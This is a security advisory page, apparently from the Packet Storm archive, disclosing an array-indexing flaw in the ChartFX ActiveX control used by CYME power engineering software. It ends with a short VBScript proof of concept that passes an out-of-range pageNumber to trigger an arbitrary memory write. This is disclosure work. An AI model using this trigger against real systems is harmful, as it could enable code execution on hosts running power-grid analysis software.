ignore security and it'll go away

Cyme ChartFX Client Server Array Indexing

Cyme ChartFX Client Server Array Indexing
Posted Oct 4, 2012
Authored by Francis Provencher

Cyme ChartFX client server suffers from a vulnerability that is caused due to an indexing error in the "ShowPropertiesDialog()" method (ChartFX.ClientServer.Core.dll) of the ChartFX ActiveX Control. This can be exploited to write a single byte value to an arbitrary memory location via the "pageNumber" parameter. Successful exploitation may allow execution of arbitrary code.

tags | exploit, arbitrary, activex
MD5 | 7be0aa597f9b41970f0552f4257aa127

Cyme ChartFX Client Server Array Indexing

Change Mirror Download
#####################################################################################

Application: CYME Power Engineering Software

Platforms: Windows
Version: CYME version 5.0.12.663.

Secunia: SA48430

{PRL}: 2012-29

Author: Francis Provencher (Protek Research Lab's)

Website: http://www.protekresearchlab.com/

Twitter: @ProtekResearch


#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


#####################################################################################

===============
1) Introduction
===============

The CYME Power Engineering software is a suite of applications composed of a network editor, analysis
modules and user-customizable model libraries from which you can choose to get the most powerful solution.

The modules available comprise a variety of advanced applications and extensive libraries for either
transmission/industrial or distribution power network analysis.

(http://www.cyme.com/software/)

This software is use by all major electrical production/distrubtion company
http://www.cyme.com/company/clients/

#####################################################################################

============================
2) Report Timeline
============================

2012-03-14 Vulnerability reported to Secunia
2012-10-03 Publication of this advisory (180 Days)


#####################################################################################

============================
3) Technical details
============================
The vulnerability is caused due to an indexing error in the "ShowPropertiesDialog()"
method (ChartFX.ClientServer.Core.dll) of the ChartFX ActiveX Control. This can be
exploited to write a single byte value to an arbitrary memory location via the
"pageNumber" parameter. Successful exploitation may allow execution of arbitrary code.


#####################################################################################

===========
4) The Code
===========
<object classid='clsid:E9DF30CA-4B30-4235-BF0C-7150F646606C' id='target' />
<script language='vbscript'>
targetFile = "C:\CYME\CYMDIST50TRIAL\ChartFX.ClientServer.Core.dll"
prototype = "Sub ShowPropertiesDialog ( ByVal context As Variant , ByVal pageNumber As Long )"
memberName = "ShowPropertiesDialog"
progid = "Cfx62ClientServer.Chart"
argCount = 2

arg1="defaultV"
arg2=2147483647

target.ShowPropertiesDialog arg1 ,arg2

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    5 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close